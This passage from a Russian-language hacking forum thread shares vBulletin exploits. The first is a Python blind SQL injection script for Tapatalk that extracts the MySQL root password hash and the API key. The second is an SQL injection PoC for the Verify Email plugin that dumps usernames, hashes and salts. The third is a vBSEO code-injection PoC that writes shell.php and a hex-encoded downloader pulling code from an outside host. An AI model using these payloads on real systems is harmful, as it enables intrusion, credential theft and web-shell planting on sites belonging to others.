    if LooseVersion(version) <= LooseVersion("5.2.1"):
    print "v.%s :) - OK"%version 
    return path
    print "v.%s :( - not vulnerable"%version
    return None
    
    def rpc_connect(self):
    self.rpc = xmlrpclib.ServerProxy(self.path,verbose=self.debug)
    
    def attack_1(self, sqli, sleep=2):
    
    '''
    SELECT subscribethreadid
    FROM subscribethread AS subscribethread
    LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
    WHERE subscribethreadid = <INJECTION>
    AND subscribethreadid.userid = 0";
    
    <INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE
    '''
    
    query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep)
    query += "union select subscribethreadid from subscribethread where 1=1 OR 1=1" # fix query for "AND subscribeforum.userid=0"
    
    if self.debug:
    print """ SELECT subscribethreadid
    FROM subscribethread AS subscribethread
    LEFT JOIN user AS user ON (user.userid=subscribethread.userid)
    WHERE subscribethreadid = %s
    AND subscribethread.userid = 0"""%query
    
    return self.rpc.unsubscribe_topic("s_%s"%query) #no escape, invalid_char="_"
    
    def attack_2(self, sqli, sleep=2):
    '''
    SELECT subscribeforumid
    FROM subscribeforum AS subscribeforum
    LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
    WHERE subscribeforumid = <INJECTION>
    AND subscribeforum.userid = 0";
    
    <INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE
    '''
    
    query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep)
    query += "union select subscribeforumid from subscribeforum where 1=1 OR 1=1" # fix query for "AND subscribeforum.userid=0"
    
    if self.debug:
    print """ SELECT subscribeforumid
    FROM subscribeforum AS subscribeforum
    LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
    WHERE subscribeforumid = %s
    AND subscribeforum.userid = 0"""%query
    
    return self.rpc.unsubscribe_forum("s_%s"%query) #no escape, invalid_char="_"
    
    def attack_blind(self,sqli,sleep=2):
    return self.attack_func(sqli,sleep=sleep)
    #return self.attack_func("-1 OR subscribethreadid = ( %s AND (select sleep(4)) ) UNION SELECT 'aaa' FROM subscribethread WHERE subscribethreadid = -1 OR 1 "%sqli)
    
    def attack_blind_guess(self,query, column, charset=string.ascii_letters+string.digits,maxlength=32, sleep=2, case=True):
    '''
    provide <query> = select -1 from user where user='debian-sys-maint' where <COLUMN> <GUESS>
    '''
    
    
    hit = False
    # PHASE 1 - guess entry length
    print "[ ] trying to guess length ..."
    for guess_length in xrange(maxlength+1):
    q = query.replace("<COLUMN>","length(%s)"%column).replace("<GUESS>","= %s"%guess_length)
    
    self.stopwatch()
    self.attack_blind(q, sleep)
    duration = self.stopwatch()
    
    print ".",
    
    if duration >= sleep-sleep/8:
    # HIT! - got length! => guess_length
    hit = True
    print ""
    break
    
    if not hit:
    print "[ !!] unable to guess password length, check query!"
    return None
    
    
    print "[ *] LENGTH = %s"%guess_length
    
    # PHASE 2 - guess password up to length
    print "[ ] trying to guess value ..."
    hits = 0
    result = ""
    for pos in xrange(guess_length):
    # for each char pos in up to guessed length
    for attempt in self.bruteforce(charset, 1):
    # probe all chars in charset
    #attempt = re.escape(attempt)
    if attempt == "%%":
    attempt= "\%"
    #LIKE binary = case sensitive.might be better to do caseinsensitive search + recheck case with binary
    q = query.replace("<COLUMN>",column).replace("<GUESS>","LIKE '%s%s%%' "%(result,attempt))
    
    self.stopwatch()
    self.attack_blind(q, sleep)
    duration = self.stopwatch()
    
    #print result,attempt," ",duration
    print ".",
    if duration >= sleep-sleep/8:
    if case:
    # case insensitive hit - recheck case: this is drastically reducing queries needed.
    q = query.replace("<COLUMN>",column).replace("<GUESS>","LIKE binary '%s%s%%' "%(result,attempt.lower()))
    self.stopwatch()
    self.attack_blind(q, sleep)
    duration = self.stopwatch()
    if duration >= sleep-sleep/8:
    attempt = attempt.lower()
    else:
    attempt = attempt.upper()
    # case sensitive - end
    
    
    
    # HIT! - got length! => guess_length
    hits += 1
    print ""
    print "[ +] HIT! - %s[%s].."%(result,attempt)
    result += attempt
    break 
    
    if not hits==guess_length:
    print "[ !!] unable to guess password length, check query!"
    return None
    
    print "[ *] SUCCESS!: query: %s"%(query.replace("<COLUMN>",column).replace("<GUESS>","='%s'"%result)) 
    return result 
    
    def bruteforce(self, charset, maxlength):
    return (''.join(candidate)
    for candidate in itertools.chain.from_iterable(itertools.product(charset, repeat=i)
    for i in range(1, maxlength + 1)))
    
    def stopwatch(self):
    stop = time.time()
    diff = stop - self.stopwatch_start
    self.stopwatch_start=stop
    return diff
    
    if __name__=="__main__":
    #googledork: https://www.google.at/search?q=Tapatalk+Banner+head+start
    DEBUG = False
    TARGET = "http://TARGET/vbb4/forum.php"
    x = Exploit(TARGET,debug=DEBUG)
    
    print "[ ] TAPATALK for vBulletin 4.x - SQLi"
    print "[--] Target: %s"%TARGET
    if DEBUG: print "[--] DEBUG-Mode!" 
    
    print "[ +] Attack - sqli"
    
    
    query = u"-1 UNION SELECT 1%s"%unichr(0)
    if DEBUG:
    print u""" SELECT subscribeforumid
    FROM subscribeforum AS subscribeforum
    LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
    WHERE subscribeforumid = %s
    AND subscribeforum.userid = 0"""%query
    
    
    print "[ *] guess mysql user/pass"
    print x.attack_blind_guess("select -1 from mysql.user where user='root' and <COLUMN> <GUESS>", 
    column="password",
    charset="*"+string.hexdigits,
    maxlength=45) # usually 40 chars + 1 (*)
    
    print "[ *] guess apikey"
    print x.attack_blind_guess("select -1 from setting where varname='apikey' and <COLUMN> <GUESS>",
    column='value',
    charset=string.ascii_letters+string.digits,
    maxlength=14,
    )
    
    print "-- done --"
     
    30 окт 2014
  13. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    vBulletin 4.x Verify Email Before Registration Plugin - SQL Injection​


    Код:
    #Title: vBulletin Verify Email Before Registration Plugin - SQL Injection
    #Date: September 19 2014
    #Version: Any vBulletin 4.*.* version which has the plugin installed.
    #Plugin: http://www.vbulletin.org/forum/showthread.php?t=294164
    #Author: Dave (FW/FG)
     
    The vulnerability resides in the register_form_complete hook, and some 
    other hooks.
    The POST/GET data is not sanitized before being used in queries.
     
    SQL injection at:
    http://example.com/register.php?so=1&emailcode=[sqli]
     
    PoC:
    http://example.com/register.php?so=1&emailcode=1' UNION SELECT null, 
    concat(username,0x3a,password,0x3a,salt), null, null, null, null FROM 
    user WHERE userid = '1
     
    Now look at the source of the page and find:
    <input type="text" style="display: none" name="email" id="email" 
    maxlength="50" value="[DATA IS HERE]" dir="ltr" tabindex="1">
    <input type="text" style="display: none" name="emailconfirm" id="email" 
    maxlength="50" value="[DATA IS HERE]" dir="ltr" tabindex="1">
     
    Vulnerable hooks:
    profile_updatepassword_complete (Email field when you want to change 
    your email address after being logged in.)
    register_addmember_complete (After submitting the final registration form.)
    register_addmember_process
    register_form_complete (This example)
    register_start (Email confirmation form at register.php)
     
    30 окт 2014
  14. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    vBulletin vBSEO 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability​


    Код:
    #################################################################################################################
    [+] Exploit Title: vBulletin 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability
    [+] Discovered By: Dariush Nasirpour (Net.Edit0r)
    [+] My Homepage: black-hg.org / nasirpour.info
    [+] Date: [2015 27 February]
    [+] Vendor Homepage: vBulletin.com
    [+] Tested on: [vBulletin 4.2.2]
    [+] Greeting : Ali Razmjoo - Ehsan Nezami - Arash Shams - Ramin Shahkar and all my freinds ( #bhg )
    #################################################################################################################
    Remote Code Injection:
    +++++++++++++++++++++++++
    1) You Must Register In The vBulletin http://server/register.php example:[blackhat]
    
    2) go to your user profile example: [http://server/members/blackhat.html]
    
    3) post something in visitor message and record post data with live http header
    
    [example] : message_backup=&message=For-Test-Sample&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=
    1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=
    
    4- change message to anything "For-Test-Sample" => "ALEEEEEEEEX" [because vBulletin don't let you send same comment in a time]
    
    [Now post this with hackbar:]
    
    URL: http://server/visitormessage.php?do=message
    
    [Post data]
    message_backup=&message=ALEEEEEEEEX&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=
    1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=
    
    [And referrer data:] 
    PoC : http://server/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked")}}]
    
    [Example referrer data:] > upload downloader.php and s.php
    PoC : http://server/members/g3n3rall.html?a=$stylevar%5b$%7b$%7bfile_put_contents(
    "downloader.php","\x3C\x3F\x70\x68\x70\x0D\x0A\x24\x68\x6F\x6D\x65\x70\x61\x67\x65\x20\x3D\x20\x66\x69\x6C\x65\x5F\x67\x65\x74\x5F\x63\x6F\x6E\x74\x65\x6E\x74\x73\x28\x27\x68\x74\x74\x70\x3A\x2F\x2F\x70\x61\x69\x65\x6E\x63\x68\x61\x74\x2E\x63\x6F\x6D\x2F\x64\x2F\x64\x72\x2E\x74\x78\x74\x27\x29\x3B\x0D\x0A\x24\x66\x20\x3D\x20\x66\x6F\x70\x65\x6E\x28\x27\x73\x2E\x70\x68\x70\x27\x2C\x27\x77\x27\x29\x3B\x0D\x0A\x66\x77\x72\x69\x74\x65\x28\x24\x66\x2C\x24\x68\x6F\x6D\x65\x70\x61\x67\x65\x29\x3B\x0D\x0A\x3F\x3E")}}]
    
    5- Open hackbar and tamper it with taper data:
    referrer data has been URL encoded by browser , you have to replace this again with tamper data: http://server/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked")}}]
    
    and submit request.
    
    ################################################################################################################
     
    23 мар 2015
    1 человеку нравится это.

Поделиться этой страницей

Загрузка...